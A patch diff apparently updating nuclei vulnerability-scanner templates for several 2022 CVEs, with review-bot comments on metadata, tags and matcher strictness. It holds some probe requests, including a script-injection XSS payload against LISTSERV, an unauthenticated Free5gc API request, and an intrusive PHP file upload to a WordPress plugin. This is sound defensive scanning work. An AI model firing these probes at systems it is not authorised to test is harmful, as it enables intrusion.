+++ b/nuclei-templates/CVE-2022/CVE-2022-38870.yaml 
@@ -6,19 +6,32 @@ info: severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information. + remediation: | + Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: - https://github.com/free5gc/free5gc/issues/387 - https://nvd.nist.gov/vuln/detail/CVE-2022-38870 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 + epss-score: 0.01064 + epss-percentile: 0.83839 + cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: free5gc + product: free5gc shodan-query: http.title:"free5GC Web Console" tags: cve,cve2022,free5gc,exposure -requests: +http: - raw: - | GET /api/subscriber HTTP/1.1 @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39048.yaml b/nuclei-templates/CVE-2022/CVE-2022-39048.yaml index 4250b60977..09b8437870 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39048.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39048.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39048 cwe-id: CWE-79 - epss-score: 0.00677 - epss-percentile: 0.77612 + epss-score: 0.01306 + epss-percentile: 0.8443 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true 
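Review bot: The added `remediation:` text, `Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1`, is self-contradictory: 3.2.1 is the affected version named in the description and in the new `cpe`, so there is no patched version of 3.2.1 to upgrade to. `remediation: Upgrade free5gc to a release later than 3.2.1 that includes the fix for CVE-2022-38870, and restrict network access to the web console API until then.` keeps the wording consistent with the version named above; the `/api/subscriber` path the template requests is visible in the first raw request of this hunk.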
@@ -69,4 +69,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true -# digest: 4a0a00473045022100992e1dd03c6d5d5aa09f7f5387e88166ddd0d8bec7b003d880ee1cfc20a22f38022020ed1b040a15795f6038e2a095403a90dce53851de5fa03bcdd6cc53cd3dd55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3908.yaml b/nuclei-templates/CVE-2022/CVE-2022-3908.yaml index ed5c636839..9876676e44 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3908.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 1.4.7. reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32966 + epss-score: 0.00119 + epss-percentile: 0.45893 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +27,7 @@ info: vendor: helloprint product: helloprint framework: wordpress - tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan + tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Translation added\\\"> successfully")' condition: and -# digest: 480a00453043021f3f4f4f0a8159dabce7f86a6e1c603ffec853df2c793b85ee6225a49bf65c8202207f27cc7050749b3d13223a28bb01b26cbc8c4dc32e03bc096c07307860eb3c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e286204c09dd09c8f88d70cfffd4057fb812e02c12e9f8d003c9cbe275bac56022046153de04d2c4740670bdce031f4191724837e97543756dad26a518e21d528f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39195.yaml b/nuclei-templates/CVE-2022/CVE-2022-39195.yaml index bc2b68f019..17f9d4d0d6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39195.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39195.yaml 
@@ -6,36 +6,48 @@ info:
 severity: medium
 description: |
 LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
 reference:
 - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
 - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
 - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
 - https://nvd.nist.gov/vuln/detail/CVE-2022-39195
+ - https://github.com/ARPSyndicate/cvemon
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-39195
 cwe-id: CWE-79
+ epss-score: 0.00211
+ epss-percentile: 0.58386
+ cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 2
+ vendor: lsoft
+ product: listserv
 shodan-query: http.html:"LISTSERV"
- verified: "true"
- tags: cve,cve2022,xss,listserv,packetstorm
+ tags: cve,cve2022,xss,listserv,packetstorm,lsoft
-requests:
+http:
 - method: GET
 path:
 - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
 - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
 stop-at-first-match: true
+ matchers-condition: and
 matchers:
 - type: word
 words:
 - ""
 - "LISTSERV"
- condition: and
 case-insensitive: true
+ condition: and
- type: word
 part: header
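Review bot: In the first word matcher the leading entry reads as an empty string (`- ""`) on this page; if the file really holds an empty string there, that word is contained in every body, so with `condition: and` the check degenerates to `LISTSERV` plus the header and status matchers, and the entry should be the reflected payload the template expects to see echoed back. If the rendering merely stripped a tag-like payload from the line, this point does not apply. Separately, the new `remediation: |` text (`Apply the latest security patches or updates provided by the vendor`) names no fixed release; if one is known from the references it belongs here. The reordering that moves `condition: and` below `case-insensitive: true` and adds `matchers-condition: and` is fine and is not the concern.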
@@ -45,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3933.yaml b/nuclei-templates/CVE-2022/CVE-2022-3933.yaml index c6539a674c..824a6907a9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3933.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3933.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks. remediation: Fixed in version 3.9.6. reference: - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4 - https://wordpress.org/plugins/essential-real-estate/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3933 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3933 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +29,7 @@ info: vendor: g5theme product: essential_real_estate framework: wordpress - tags: wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss + tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme http: - raw: @@ -47,4 +51,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ere_property_gallery")' condition: and -# digest: 490a00463044022062d1c6b68cd40ad93b63a960b638bd8399b9953e855a83e9488a1e6baabccd9702202f67993c36673d31fa7f3ccf3cb0d2bb38797bd6b15fe66a0b7af249da5cdf05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fe935b7c005247f683b953718e68e4676806de61fba39833160c8503149843f0220541a0e4a4597d27026619f26e233f4d496a8860c45a55e6254286e1975f5b1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3934.yaml b/nuclei-templates/CVE-2022/CVE-2022-3934.yaml index cfea70a449..5dbc2c3283 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3934.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3934.yaml 
@@ -6,17 +6,22 @@ info: severity: medium description: | WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.13. reference: - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a - https://nvd.nist.gov/vuln/detail/CVE-2022-3934 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3934 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: mehanoid product: flat_pm framework: wordpress - tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin + tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid http: - raw: 
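Review bot: The rewritten tags line in the `@@ -24,7 +29,7 @@` hunk starts `tags: cve2022,cve,authenticated,...`, which inverts the `cve,cve2022` ordering this same commit applies to every other template in the patch (CVE-2022-3933 and CVE-2022-3980, for example). Suggest `tags: cve,cve2022,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid` so the lead tags can be grepped uniformly.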
@@ -45,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")' condition: and -# digest: 4a0a0047304502206107a1dfa22655f5d418b0eb109b56aae50b4fccee9b2521c23c9593b208e98e022100ee009d704733d31e1c446c04573156c6a208b59fae8cad5fea60ec81aa7e500c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3980.yaml b/nuclei-templates/CVE-2022/CVE-2022-3980.yaml index 1caac015ab..a0550b3a6f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3980.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3980.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. reference: - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee - https://nvd.nist.gov/vuln/detail/CVE-2022-3980 + - https://github.com/bigblackhat/oFx classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.64829 - epss-percentile: 0.97566 + epss-score: 0.49036 + epss-percentile: 0.97431 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -49,4 +52,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 4a0a00473045022055acf7afea47b8c8489e455f5796d4d5066eb9aa73cb9bbeaa66a4b8008c853602210083c5f822cebf2b24d22e9534e2d371eea5775454abeaea1b1248a5eaabff0dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3982.yaml b/nuclei-templates/CVE-2022/CVE-2022-3982.yaml index cb0c93dccb..a6d0caaa93 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3982.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3982.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.18164 - epss-percentile: 0.95662 + epss-score: 0.20211 + epss-percentile: 0.96236 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +28,10 @@ info:
 vendor: wpdevart
 product: booking_calendar
 framework: wordpress
- tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive
+ tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart
+
+variables:
+ string: "CVE-2022-3982"
 http:
 - raw:
@@ -61,7 +67,7 @@ http:
 Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
 Content-Type: application/octet-stream
-
+
 --------------------------1cada150a8151a54--
 - |
@@ -69,12 +75,10 @@ http:
 Host: {{Hostname}}
 matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
 extractors:
 - type: regex
@@ -83,4 +87,4 @@ http:
 regex:
 - var wpdevart.*"ajaxNonce":"(.*?)"
 internal: true
-# digest: 4b0a00483046022100e158f5fa71617358a4ad927a9bc01d160c83615e64691f854c3cb4a43f6dec71022100e79592c9c921d5e55b20a2d415ce31b287d036b47955ff7e1971972b0e25e726:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202048dbf451944c332d32cdf8e3e5afbd0760aad3b5c7ca8c8c9f5b8dc67c72c4022100cc0a5e2454e13a1a291ddb35096375206887fdc27eabed9aa389628c9cf910d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-39952.yaml b/nuclei-templates/CVE-2022/CVE-2022-39952.yaml
index 655b8b64e0..bbf0783c46 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-39952.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-39952.yaml
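Review bot: The replacement matcher in the `@@ -69,12 +75,10 @@` hunk is looser than the one it removes: the old dsl required `status_code_3 == 200`, a `text/html` content type and the hash together, whereas the new word matcher only checks that `{{md5(string)}}` occurs somewhere in `body_3`. Because this is an intrusive template that uploads a PHP file, the verdict on the third response should stay strict; keeping the status check is a one-matcher change, e.g. `- type: dsl` / `dsl:` / `- 'status_code_3 == 200 && contains(body_3, md5(string))'`. The new `variables:` block with `string: "CVE-2022-3982"` presumably feeds whatever the uploaded file echoes back, but nothing in the template says so; a one-line comment above `variables:` stating that the upload body prints the md5 of this string would spare the next maintainer the inference.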
@@ -6,19 +6,22 @@ info: severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data loss. remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. reference: - https://fortiguard.com/psirt/FG-IR-22-300 - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ - https://github.com/horizon3ai/CVE-2022-39952 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 + - https://github.com/1f3lse/taiE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-668,CWE-73 - epss-score: 0.86893 - epss-percentile: 0.9831 + epss-score: 0.96445 + epss-percentile: 0.99548 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: fortinet product: fortinac shodan-query: title:"FortiNAC" - tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive + tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" 
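Review bot: The added impact line `Successful exploitation of this vulnerability could lead to unauthorized access, data loss.` stops mid-list; the description above already spells out the consequences, so suggest `Successful exploitation of this vulnerability could lead to unauthorized code execution, disclosure of sensitive information, or data loss.` While this block is being edited, the untouched context line `remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.` lists 9.2.6 twice and could be deduplicated in the same commit.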
@@ -62,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067281ed86df00376a77d93e4ea41aa9c523ff8074d2addfa0857ad128008d247022075325f32efe56fa081e8d94f533c6ade346337b0b08fe5990f357f7f6263bba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39960.yaml b/nuclei-templates/CVE-2022/CVE-2022-39960.yaml index d6031f6ff7..74311099bb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39960.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39960.yaml 
@@ -1,26 +1,39 @@ id: CVE-2022-39960 info: - name: Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access + name: Jira Netic Group Export <1.0.3 - Missing Authorization author: For3stCo1d severity: medium description: | - The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI. + Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data. + remediation: | + Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue. 
reference: - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history - https://nvd.nist.gov/vuln/detail/CVE-2022-39960 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 + epss-score: 0.21326 + epss-percentile: 0.96012 + cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: + verified: true + max-request: 1 + vendor: netic + product: group_export + framework: jira shodan-query: http.component:"Atlassian Jira" - verified: "true" tags: cve,cve2022,atlassian,jira,netic,unauth -requests: +http: - raw: - | POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1 @@ -48,3 +61,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39986.yaml b/nuclei-templates/CVE-2022/CVE-2022-39986.yaml index 3e65fcea27..977beb7f8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39986.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability. reference: 
@@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-39986 cwe-id: CWE-77 - epss-score: 0.84732 - epss-percentile: 0.98184 + epss-score: 0.87977 + epss-percentile: 0.98588 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 - tags: packetstorm,cve,cve2020,raspap,rce + tags: cve,cve2022,packetstorm,raspap,rce http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faf75aa32d9fef61de889c0437c70bb61ad79c735fa1b4b49e87587ecf05d284022100fc9c8d03291609c2bc2ccd01ec690dd1e11330d8dd1d43983ad03e2681ed2b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40022.yaml b/nuclei-templates/CVE-2022/CVE-2022-40022.yaml index 6e1860ee1b..4d2e1d1f67 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40022.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.84943 - epss-percentile: 0.98198 + epss-score: 0.82869 + epss-percentile: 0.98341 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" 
@@ -28,7 +30,7 @@ info: vendor: microchip product: syncserver_s650_firmware shodan-query: html:"Symmetricom SyncServer" - tags: packetstorm,cve,cve2022,syncserver,rce,unauth + tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip http: - raw: @@ -56,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100d01b5b255020469eeb12918b99f667fb5d28b158016bd37a43e1ae65a48f276b0221009860d8ef653a00fd5c0f381ce8023e2d8c6327ba2d3bac66520ce06b2e7df8a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40032.yaml b/nuclei-templates/CVE-2022/CVE-2022-40032.yaml index f9277a7297..85d799f96c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40032.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40032.yaml @@ -17,15 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40032 cwe-id: CWE-89 - epss-score: 0.00205 - epss-percentile: 0.58363 + epss-score: 0.00174 + epss-percentile: 0.54566 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: packetstorm,cve,cve2022,simple-task,stms,sqli + tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project http: - raw: 
@@ -45,4 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and -# digest: 4b0a00483046022100f52b26f50d7050f0538f29ea456d9c718405e4e3770bbac34eb080dce02619e8022100b566433951ec9e96f45fe11ce5319ff33f699f4aee2ee8826caa59b1118e747f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40047.yaml b/nuclei-templates/CVE-2022/CVE-2022-40047.yaml index bf5bd8b721..d4dae819da 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40047.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40047.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.00535 - epss-percentile: 0.74548 + epss-percentile: 0.76696 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -60,4 +60,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 